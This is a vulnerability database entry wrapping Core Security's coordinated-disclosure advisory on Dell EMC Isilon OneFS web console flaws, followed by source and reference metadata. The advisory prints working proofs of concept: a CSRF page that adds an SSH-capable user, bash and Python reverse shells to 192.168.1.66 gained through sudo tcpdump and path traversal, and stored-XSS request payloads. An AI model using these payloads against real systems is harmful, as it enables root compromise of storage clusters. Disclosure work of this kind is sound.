v2\n\niQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ\n319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT\nRR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW\nu5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt\n05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN\nEh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko=\n=c/8F\n-----END PGP SIGNATURE-----\n\n\n. **Advisory Information**\n\nTitle: Dell EMC Isilon OneFS Multiple Vulnerabilities\nAdvisory ID: CORE-2017-0009\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities\nDate published: 2018-02-14\nDate of last update: 2018-02-14\nVendors contacted: Dell EMC\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Cross-Site Request Forgery [CWE-352], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nNeutralization of Input During Web Page Generation [CWE-79], Improper\nNeutralization of Input During Web Page Generation [CWE-79], Improper\nNeutralization of Input During Web Page Generation [CWE-79], Improper\nNeutralization of Input During Web Page Generation [CWE-79], Improper\nNeutralization of Input During Web Page Generation [CWE-79], Improper\nNeutralization of Input During Web Page Generation [CWE-79]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186,\nCVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201,\nCVE-2018-1202\n\n3. **Vulnerability Description**\n\nDell EMC\u0027s website states that:[1]\n\nThe EMC Isilon scale-out NAS storage platform combines modular hardware\nwith unified software to harness unstructured data. Powered by the OneFS\noperating system, an EMC Isilon cluster delivers a scalable pool of\nstorage with a global namespace. \n\nThe platform\u0027s unified software provides centralized Web-based and\ncommand-line administration to manage the following features:\n\n- A cluster that runs a distributed file system\n\n- Scale-out nodes that add capacity and performance\n\n- Storage options that manage files and tiering\n\n- Flexible data protection and high availability\n\n- Software modules that control costs and optimize resources\n\nMultiple vulnerabilities were found in the Isilon OneFS Web console that\nwould allow a remote attacker to gain command execution as root. **Vulnerable Packages**\n\n. Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204)\n. Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs)\n. Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs)\n. Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs)\n. Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188,\n CVE-2018-1201, CVE-2018-1204, CVE-2018-1213)\n. https://support.emc.com/downloads/15209_Isilon-OneFS\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Ivan Huertas and\nMaximiliano Vidal from Core Security Consulting Services. The\npublication of this advisory was coordinated by Alberto Solino from Core\nAdvisories Team. **Technical Description / Proof of Concept Code**\n\nThe Web console contains several sensitive features that are vulnerable\nto cross-site request forgery. We describe this issue in section 7.1. \n\nSections 7.2 and 7.3 show two vectors to escalate privileges to root. \n\nVarious persistent cross-site scripting issues are presented in the\nremaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution**\n\n[CVE-2018-1213]\nThere are no anti-CSRF tokens in any forms on the Web interface. \nThis would allow an attacker to submit authenticated requests when an\nauthenticated user browses an attacker-controlled domain. \n\nThe Web console contains a plethora of sensitive actions that can be\nabused, such as adding new users with SSH access or re-mapping existing\nstorage directories to allow read-write-execute access to all users. \n\nAll requests are JSON-encoded, which in some cases might hinder\nexploitation of CSRF vulnerabilities. However, the application does not\nverify the content-type set. This allows an attacker to exploit the CSRF\nvulnerabilities by setting a text/plain content-type and sending the\nrequest body as JSON_PAYLOAD=ignored. \n\nThe following proof of concept creates a new user and assigns him a new\nrole with enough privileges to log in via SSH, configure identifies,\nmanage authentication providers, configure the cluster and run the\nremote support tools. \n\n/-----\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cform id=\"addUser\" target=\"_blank\"\naction=\"https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true\u0026resolve_names=true\u0026start=0\u0026zone=System\u0026provider=lsa-local-provider%3ASystem\"\nmethod=\"POST\" enctype=\"text/plain\"\u003e\n \u003cinput type=\"hidden\"\nname=\"{\"name\":\"pepito\",\"enabled\":true,\"shell\":\"/bin/zsh\",\"password_expires\":false,\"password\":\"pepito\"}\"\nvalue=\"\" /\u003e\n \u003c/form\u003e\n \u003cform id=\"addRole\" target=\"_blank\"\naction=\"https://192.168.1.11:8080/platform/1/auth/roles\" method=\"POST\"\nenctype=\"text/plain\"\u003e\n \u003cinput type=\"hidden\"\nname=\"{\"members\":[{\"name\":\"pepito\",\"type\":\"user\"}],\"name\":\"pepito_role\",\"privileges\":[{\"id\":\"ISI_PRIV_AUTH\",\"name\":\"Auth\",\"read_only\":false},{\"id\":\"ISI_PRIV_CLUSTER\",\"name\":\"Cluster\",\"read_only\":false},{\"id\":\"ISI_PRIV_REMOTE_SUPPORT\",\"name\":\"Remote\nSupport\",\"read_only\":false},{\"id\":\"ISI_PRIV_LOGIN_SSH\",\"name\":\"SSH\",\"read_only\":true}]}\"\nvalue=\"\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.getElementById(\"addUser\").submit();\n window.setTimeout(function() {\ndocument.getElementById(\"addRole\").submit() }, 1000);\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n-----/\n\n7.2. **Privilege escalation due to incorrect sudo permissions**\n\n[CVE-2018-1203]\nThe compadmin user can run the tcpdump binary with root privileges via\nsudo. This allows for local privilege escalation, as tcpdump can be\ninstructed to run shell commands when rotating capture files. \n\n/-----\npepe-1$ id\nuid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon)\npepe-1$ cat /tmp/lala.sh\n#!/bin/bash\n\nbash -i \u003e\u0026 /dev/tcp/192.168.1.66/8888 0\u003e\u00261\n-----/\n\nOnce the desired shell script is in place, the attacker can run tcpdump\nas follows to trigger the execution:\n\n/-----\npepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump\ntcpdump: WARNING: unable to contact casperd\ntcpdump: listening on em0, link-type EN10MB (Ethernet), capture size\n65535 bytes\n/tmp/lala.sh: connect: Connection refused\n/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused\n/tmp/lala.sh: connect: Connection refused\n/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused\n-----/\n\nAs can be seen below, the script runs with root privileges:\n\n/-----\n$ nc -lvp 8888\nListening on [0.0.0.0] (family 0, port 8888)\nConnection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2,\nsport 57692)\nbash: no job control in this shell\n[root@pepe-1 /compadmin]# id\nuid=0(root) gid=0(wheel)\ngroups=0(wheel),5(operator),10(admin),20(staff),70(ifs)\n-----/\n\n7.3. **Privilege escalation via remote support scripts**\n\n[CVE-2018-1204]\n\u003eFrom the documentation:\n\n\"OneFS allows remote support through EMC Secure Remote Services (ESRS)\nwhich monitors your EMC Isilon cluster, and with your permission, allows\nremote access to Isilon Technical Support personnel to gather cluster\ndata and troubleshoot issues.\"\n\n\"After you enable remote support through ESRS, Isilon Technical Support\npersonnel can request logs with scripts that gather EMC Isilon cluster\ndata and then upload the data. \nThe remote support scripts based on the Isilon isi_gather_info\nlog-gathering tool are located in the /ifs/data/Isilon_Support/\ndirectory on each node.\"\n\n\"Additionally, isi_phone_home, a tool that focuses on cluster- and\nnode-specific data, is enabled once you enable ESRS. This tool is\npre-set to send information about your cluster to Isilon Technical\nSupport on a weekly basis. You can disable or enable isi_phone_home from\n the OneFS command-line interface.\"\n\nAs a cluster administrator or compadmin, it is possible to enable the\nremote support functionality, hence enabling the isi_phone_home tool via\nsudo. This tool is vulnerable to a path traversal when reading the\nscript file to run, which would enable an attacker to execute arbitrary\npython code with root privileges. \n\nIf remote support is not enabled, an attacker could perform the\nfollowing operations in order to enable it:\n\n/-----\npepe-1$ sudo isi network subnets create 1 ipv4 1\npepe-1$ sudo isi network pools create 1.0\npepe-1$ sudo isi remotesupport connectemc modify --enabled=yes\n--primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no\n--gateway-access-pools=1.0\n-----/\n\nThe isi_phone_home tool is supposed to run scripts located in the\nroot-only writable directory /usr/local/isi_phone_home/script. \nHowever, the provided script name is used to construct the file path\nwithout sanitization, allowing an attacker to reference other locations. \n\n/-----\ndef run_script(script_file_name):\n script_path = CFG.get(\u0027SCRIPTDIR\u0027) + \u0027/\u0027 + script_file_name\n if os.path.isfile(script_path):\n cmd = \u0027python \u0027 + script_path + \u0027 2\u003e\u00261 \u0027\n command_thread = command.Command(cmd)\n exit_code, output =\ncommand_thread.run(int(CFG.get(\"SCRIPT_TIEMOUT\")))\n if exit_code:\n logging.error(\"Error: {0} running script: {1}\n\".format(str(exit_code), output))\n else:\n logging.error(\"File: {0} list_file_name doesn\u0027t exist\n\".format(script_path))\n-----/\n\nThe final step would be to create a malicious python script on any\nwritable location and call it via the isi_phone_tool using sudo. \nKeep in mind that the previous steps are not required if the system does\nalready have remote support enabled. \n\n/-----\npepe-1$ cat /tmp/lala.py\n#!/usr/bin/env python\n\nimport socket,subprocess,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"192.168.1.66\",8888))\nos.dup2(s.fileno(),0)\nos.dup2(s.fileno(),1)\nos.dup2(s.fileno(),2)\np=subprocess.call([\"/bin/sh\",\"-i\"])\n\npepe-1$ sudo /usr/bin/isi_phone_home --script-file\n../../../../../tmp/lala.py\n-----/\n\n/-----\n$ nc -lvp 8888\nListening on [0.0.0.0] (family 0, port 8888)\nConnection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2,\nsport 56807)\npepe-1# id\nuid=0(root) gid=0(wheel)\ngroups=0(wheel),5(operator),10(admin),20(staff),70(ifs)\n-----/\n\n7.4. *Persistent cross-site scripting in the cluster description*\n\n[CVE-2018-1186]\nThe description parameter of the /cluster/identity endpoint is\nvulnerable to cross-site scripting. \n\nAfter the cluster\u0027s description is updated, the payload will be executed\nevery time the user opens the Web console. \n\n/-----\nPUT /platform/3/cluster/identity HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)\nGecko/20100101 Firefox/55.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 61\nCookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;\nConnection: close\n\n{\"description\":\"my cluster\u003cimg src=x onerror=\\\"alert(1)\\\"/\u003e\"}\n-----/\n\n7.5. **Persistent cross-site scripting in the Network Configuration page**\n\n[CVE-2018-1187]\nThe description parameter of the /network/groupnets endpoint is\nvulnerable to cross-site scripting. \n\nAfter the description is updated, the payload will be executed every\ntime the user opens the network configuration page. \n\n/-----\nPOST /platform/4/network/groupnets HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)\nGecko/20100101 Firefox/55.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/json\nContent-Length: 186\nCookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41;\nConnection: close\n\n{\"description\":\"lala\u003cscript\u003ealert(1)\u003c/script\u003e\",\"dns_cache_enabled\":true,\"dns_options\":[],\"dns_search\":[],\"dns_servers\":[],\"name\":\"pepito2\",\"server_side_dns_search\":false}\n-----/\n\n7.6. **Persistent cross-site scripting in the Authentication Providers\npage**\n\n[CVE-2018-1188]\nThe realm parameter of the /auth/settings/krb5/realms endpoint is\nvulnerable to cross-site scripting. \n\nAfter the realm is updated, the payload will be executed every time the\nuser opens the Kerberos tab of the Authentication Providers page. \n\n/-----\nPOST /platform/1/auth/settings/krb5/realms HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)\nGecko/20100101 Firefox/55.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/json\nContent-Length: 78\nCookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41;\nConnection: close\n\n{\"is_default_realm\":true,\"kdc\":[],\"realm\":\"ASDASD\u003cimg src=x\nonerror=alert(1)\"}\n-----/\n\n7.7. **Persistent cross-site scripting in the Antivirus page**\n\n[CVE-2018-1189]\nThe name parameter of the /antivirus/policies endpoint is vulnerable to\ncross-site scripting. \n\nAfter the name is updated, the payload will be executed every time the\nuser opens the Antivirus page. \n\n/-----\nPOST /platform/3/antivirus/policies HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)\nGecko/20100101 Firefox/55.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/json\nContent-Length: 172\nCookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06;\nConnection: close\n\n{\"name\":\"pepe\u003cimg src=x\nonerror=\\\"alert(1)\\\"/\u003e\",\"description\":\"pepito\",\"enabled\":true,\"force_run\":false,\"impact\":null,\"paths\":[\"/ifs\"],\"recursion_depth\":-1,\"schedule\":null}\n-----/\n\n7.8. **Persistent cross-site scripting in the Job Operations page**\n\n[CVE-2018-1201]\nThe description parameter of the /job/policies endpoint is vulnerable to\ncross-site scripting. \n\nAfter the description is updated, the payload will be executed every\ntime the user opens the Impact Policies section of the Job Operations\npage. \n\n/-----\nPOST /platform/1/job/policies HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101\nFirefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 210\nCookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea;\nConnection: close\n\n{\"name\":\"my policy\",\"description\":\"\u003cimg src=x\nonerror=\\\"alert(1)\\\"/\u003e\",\"intervals\":[{\"begin\":\"Sunday\n00:00\",\"end\":\"Sunday\n00:00\",\"impact\":\"Low\"},{\"impact\":\"Low\",\"begin\":\"Sunday\n01:03\",\"end\":\"Monday 01:01\"}]}\n-----/\n\n7.9. **Persistent cross-site scripting in the NDMP page**\n\n[CVE-2018-1202]\nThe name parameter of the /protocols/ndmp/users endpoint is vulnerable\nto cross-site scripting. \n\nAfter the name is updated, the payload will be executed every time the\nuser opens the NDMP Settings section of the NDMP page. \n\n/-----\nPOST /platform/3/protocols/ndmp/users HTTP/1.1\nHost: 192.168.1.11:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)\nGecko/20100101 Firefox/55.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 64\nCookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;\nConnection: close\n\n{\"name\":\"\u003cimg src=x onerror=\\\"alert(1)\\\"/\u003e\",\"password\":\"123123\"}\n-----/\n\n8. **Report Timeline**\n\n2017-09-25: Core Security sent an initial notification to Dell EMC,\nincluding a draft advisory. \n2017-09-26: Dell EMC confirmed reception and informed an initial\nresponse would be ready by October 5th. \n2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities\nreported except one, for which evaluation will be finalized soon. Dell\nEMC stated that, for the confirmed issues, a remediation plan will be\nprovided by 10/16. \n2017-10-05: Core Security thanked the follow up email. \n2017-10-06: Dell EMC reported an update on one privilege escalation\nvulnerability reported, stating that \u0027ISI_PRIV_AUTH, and ISI_PRIV_ROLE\nboth are equivalent to admin level access\u0027. They said they will be\nupdating the documentation to make it clearer. \n2017-10-11: Core Security thanked for the clarification and confirmed\nthat section will be removed from the final advisory. \n2017-10-16: Core Security thanked the information and said it will\nanalyze the proposals sent once all the data is available. \n2017-10-19: Dell EMC sent a schedule for the remaining three reported\nvulnerabilities, with specific dates for every product\u0027s version. \n2017-10-31: Core Security on the schedule sent, stating that fixing the\nvulnerabilities by June 2018 is unacceptable given current industry\nstandards. Requested a review of the timeline or a thorough explanation\nthat justifies such delay. \n2017-11-01: Dell EMC answered back stating that after reviewing the\noriginal schedule, they said they believe they could have fixes ready\nfor versions 8.0.x and 8.1.x by January 2018. Only caveat is the\nvulnerability 7.1 that might be pushed past January, although they said\nthey think they could meet the January deadline. \n2017-11-13: Core Security thanked Dell\u0027s review of the release dates and\nagreed on the proposed schedule, stating Core Security would like to\npublish a single advisory for all the vulnerabilities reported. \nAlso requested CVE IDs for\neach of the issues. \n2018-01-16: Core Security asked for a status update on the release date\nfor the fixes since there was no update from Dell EMC. \n2018-01-17: Dell EMC answered back stating they are awaiting\nconfirmation from the product team about the exact dates of release. \nThey said they will get back to us by the end of this week. Dell EMC\nalso asked our GPG public key again. \n2018-01-18: Core Security thanked for the update and sent the advisory\u0027s\npublic GPG key. \n2018-01-19: Dell EMC stated they are currently working on drafting their\nadvisory and will send it back to us (including CVEs) once they have the\nnecessary approvals. \n2018-01-23: Dell EMC asked for our updated draft advisory. \n2018-01-25: Dell EMC notified that the team are targeting to have the\nfix available by February 12th. Additionally, Dell will send its draft\nadvisory by January 31th. \n2018-01-29: Core Security thanked for the update and proposed February\n14th as publication date. \n2018-01-31: Dell EMC informed Core Security that they agreed to release\non February 14th. They also provided CVE IDs for each vulnerability\nreported. \n2018-02-01: Dell EMC sent its draft advisory. \n2018-02-14: Advisory CORE-2017-0009 published. **References**\n\n[1]\nhttps://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2017 Core Security and\n(c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "BID",
"id": "103033"
},
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "PACKETSTORM",
"id": "146852"
},
{
"db": "PACKETSTORM",
"id": "146404"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-121937",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-1202",
"trust": 3.0
},
{
"db": "BID",
"id": "103033",
"trust": 1.4
},
{
"db": "EXPLOIT-DB",
"id": "44039",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-121937",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "146852",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "146404",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "BID",
"id": "103033"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "PACKETSTORM",
"id": "146852"
},
{
"db": "PACKETSTORM",
"id": "146404"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"id": "VAR-201803-1423",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:19:00.322000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EMC Isilon OneFS",
"trust": 0.8,
"url": "https://www.dellemc.com/ja-jp/storage/isilon/onefs-operating-system.htm"
},
{
"title": "Dell EMC Isilon Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=79417"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2018/mar/50"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/103033"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/44039/"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1202"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-1202"
},
{
"trust": 0.3,
"url": "http://dell.com"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1187"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1186"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1189"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1201"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1213"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1204"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1188"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1203"
},
{
"trust": 0.1,
"url": "https://support.emc.com/downloads/15209_isilon-onefs."
},
{
"trust": 0.1,
"url": "https://support.emc.com/downloads/15209_isilon-onefs"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://192.168.1.11:8080/platform/1/auth/roles\""
},
{
"trust": 0.1,
"url": "https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true\u0026resolve_names=true\u0026start=0\u0026zone=system\u0026provider=lsa-local-provider%3asystem\""
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "BID",
"id": "103033"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "PACKETSTORM",
"id": "146852"
},
{
"db": "PACKETSTORM",
"id": "146404"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "BID",
"id": "103033"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "PACKETSTORM",
"id": "146852"
},
{
"db": "PACKETSTORM",
"id": "146404"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-26T00:00:00",
"db": "VULHUB",
"id": "VHN-121937"
},
{
"date": "2018-02-14T00:00:00",
"db": "BID",
"id": "103033"
},
{
"date": "2018-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"date": "2018-03-22T12:22:22",
"db": "PACKETSTORM",
"id": "146852"
},
{
"date": "2018-02-14T23:23:23",
"db": "PACKETSTORM",
"id": "146404"
},
{
"date": "2018-03-26T18:29:01.190000",
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"date": "2018-03-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-19T00:00:00",
"db": "VULHUB",
"id": "VHN-121937"
},
{
"date": "2018-02-14T00:00:00",
"db": "BID",
"id": "103033"
},
{
"date": "2018-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"date": "2018-04-19T14:20:57.657000",
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"date": "2018-03-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell EMC Isilon Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.